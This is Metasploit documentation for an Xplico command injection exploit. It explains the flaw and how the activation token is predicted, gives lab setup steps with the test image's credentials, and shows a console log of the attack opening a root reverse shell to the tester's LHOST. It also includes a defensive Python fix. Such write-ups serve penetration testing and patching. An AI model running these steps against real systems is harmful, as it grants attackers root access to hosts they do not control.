## Vulnerable Application

This module exploits a command injection vulnerability in Xplico. Unauthenticated users can register a new account and then execute a terminal command in the context of the root user.

The specific flaw exists within Xplico, which listens on TCP port 9876 by default. The goal of Xplico is to extract the application data contained in an internet traffic capture. There is a hidden endpoint inside Xplico that allows anyone to create a new user. Once a user is created through the /users/register endpoint, it must be activated via an activation e-mail. After registration, Xplico tries to send an e-mail containing the activation code. Unfortunately, on most installations this e-mail will probably never reach the given address. However, it is possible to calculate the exact same token value, because the activation code is produced by an insecure cryptographic random string generator.

One of Xplico's features is the parsing of PCAP files. Once a PCAP file is uploaded, Xplico executes an operating system command in order to calculate the checksum of the file. The file name used in this operation is taken directly from user input and then placed inside the command without proper input validation.
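As an added example (not Xplico's code and not part of the module), here is a hypothetical hardened upload path in Python that removes both root causes described above: the client-supplied file name is checked against an allowlist and never reaches a shell, the checksum is computed in-process instead of via an external command, and the activation token is drawn from the OS CSPRNG so a client cannot recompute it. The function names and the allowlist pattern are assumptions for illustration.

```python
import hashlib
import re
import secrets
from pathlib import Path

# Hypothetical hardened handling of a PCAP upload. This is an added example
# illustrating the fix for the two weaknesses described in the text, not code
# taken from Xplico or from the Metasploit module.

# Allowlist for the client-supplied name: letters, digits, dot, dash and
# underscore only, ending in .pcap or .pcapng. Path separators, spaces and
# shell metacharacters cannot match this pattern.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}\.pcap(ng)?$")


def validate_upload_name(name: str) -> bool:
    """Return True only if the user-supplied file name is in the allowlist."""
    return bool(_SAFE_NAME.fullmatch(name)) and ".." not in name


def pcap_checksum(data: bytes) -> str:
    """Checksum the upload in-process; there is no 'md5sum <name>' shell command
    for a crafted file name to break out of. MD5 is acceptable here because the
    value is an integrity/dedup checksum, not a security control."""
    return hashlib.md5(data).hexdigest()


def store_upload(upload_dir: Path, client_name: str, data: bytes) -> tuple[str, str]:
    """Validate the client name, store the bytes under a server-chosen name,
    and return (server_name, checksum). The client name is only recorded for
    display; it never becomes part of a path or a command."""
    if not validate_upload_name(client_name):
        raise ValueError("rejected file name")
    server_name = f"{secrets.token_hex(8)}.pcap"  # server-generated, not user input
    (upload_dir / server_name).write_bytes(data)
    return server_name, pcap_checksum(data)


def new_activation_token() -> str:
    """Activation token from the OS CSPRNG (32 hex chars). Unlike a token derived
    from a predictable generator, this cannot be reproduced by the registrant."""
    return secrets.token_hex(16)
```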
## Vulnerable Application Installation Steps

Follow the instructions in the "from sourceforge" section at the following URL. Don't forget to install version 1.2.0 instead of 1.0.0. At the time of this writing, the installation commands are for version 1.0.0.
http://wiki.xplico.org/doku.php?id=ubuntu
You may also try the VirtualBox image provided by the maintainer of Xplico. I've tested this module against Xplico-1.1.0-ubuntu-13.10-i386.ova. https://sourceforge.net/projects/xplico/files/VirtualBox%20images/

The username of the VirtualBox image is "ubuntu" and the password is "reverse".
## Verification Steps

A successful check of the exploit will look like this:

- Start `msfconsole`
- `use exploit/linux/http/securityonion_xplico_exec`
- Set `RHOST`
- Set `PAYLOAD cmd/unix/reverse_awk`
- Set `LHOST`
- Run `exploit`
- Verify that you are seeing `New user successfully registered` in the console.
- Verify that you are seeing `User successfully activated` in the console.
- Verify that you are seeing `Successfully authenticated` in the console.
- Verify that you are seeing `New Case successfully created` in the console.
- Verify that you are seeing `New Sols successfully created` in the console.
- Verify that you are seeing `PCAP successfully uploaded. Pcap parser is going to start on server side` in the console.
- Verify that you are getting `We are at PCAP decoding phase. Little bit more patience...` in the console.
- Verify that you have your root shell.
## Scenarios

```
msf > use exploit/linux/http/securityonion_xplico_exec
msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30
RHOST => 12.0.0.30
msf exploit(securityonion_xplico_exec) >
msf exploit(securityonion_xplico_exec) > exploit
[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/
set payload cmd/unix/generic set payload cmd/unix/reverse_netcat
set payload cmd/unix/reverse_awk
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk
payload => cmd/unix/reverse_awk
msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(securityonion_xplico_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Initiating new session on server side
[*] Registering a new user
[+] New user successfully registered
[*] Username: mwbvnyowr
[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT
[*] Calculating em_key code of the user
[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e
[+] User successfully activated
[*] Authenticating with our activated new user
[+] Successfully authenticated
[*] Creating new case
[+] New Case successfully created. Our pol_id = 36
[*] Creating new xplico session for pcap
[+] New Sols successfully created. Our sol_id = 54
[*] Uploading malformed PCAP file
[+] PCAP successfully uploaded. Pcap parser is going to start on server side.
[*] Parsing has started. Wait for parser to get the job done...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 +0300
id
uid=0(root) gid=0(root) groups=0(root)
```